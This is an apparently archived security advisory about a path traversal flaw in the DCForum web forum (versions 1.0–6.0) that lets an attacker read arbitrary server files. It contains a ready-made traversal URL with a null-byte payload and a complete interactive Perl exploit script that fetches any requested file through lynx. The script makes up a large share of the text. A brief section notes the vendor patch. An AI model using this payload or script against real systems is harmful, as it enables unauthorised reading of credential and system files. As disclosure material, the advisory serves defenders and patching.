COMMAND

    DCForum

SYSTEMS AFFECTED

    DCForum all versions of DCForum 1.0 - 6.0(Current)

PROBLEM

    Following is based on  a Cgi Security Advisory  #2.  Any file  can
    be  read  with  the  permissions  of  user  nobody(or  webserver).
    Posible root comprimise  in /dcforum/dcboard.cgi script.   Command
    execution is not allowed (Read  Only).  This has only  been tested
    on unix and linux versions and is unknown if windows versions  are
    effected.

    It causes the deletion  of dcboard.cgi if you  ask it to view  its
    own source.  Cause for this is  unknown as of now since we do  not
    have the source.

    For the above reason authors cannot release the exploit itself  at
    this point in time.  They  would release it but it caused  to much
    damage by "clicking on a link".  If it simply gave you passwd file
    that would be one thing but it deleted a data and perhaps more not
    know of yet.

    SteeLe added following.  Simple exploitation:

        http://localhost/dcforum/dcforum.cgi?az=list&forum=../../../../../.././etc/hosts%00

    The code:

    #!/usr/bin/perl
    # DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To CGISecurity.com Advisory)
    # Exploits Vulnerability That Allows Remote File Reading
    # By SteeLe
    # BEGIN { open(STDERR,">errors.txt"); } error checking
    $lynx = "/usr/bin/lynx"; # specify
    
    $site = $ARGV[0];
    $cgi  = $ARGV[1];
    $inet = inet_aton($site);
    
    die "\n\t---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' ||
    @ARGV < 2);
    
    print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
    print "\n\t---   By the cool fellas at *   ---\n\n";
    
    while(true) { # yea i think I stole this from the pollex.pl , uh thanks.
    
    print "[dcforum]Option:";
    $action = <STDIN>;
    chomp($action);
    
    print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action ne "r" || $action ne "q");
    
    if ($action eq "r") {
    print "\nFile(to read):";
    $file = <STDIN>;
    chomp($file);
    # Old fashion shit, and I was lazy so be happy
    $url = "?az=list&file=$file%00";
    $site = `$lynx http://$site$cgi$url`;
    print $site;
    }
    elsif ($action eq "q") {
     print "now exiting program\n";
     exit;
      }
    }

SOLUTION

    The vendor has been contacted about this serious security problem.
    A patch was issues within 1 hour of the finding of this hole.

        http://www.dcscripts.com/dcforum/dcfNews/124.html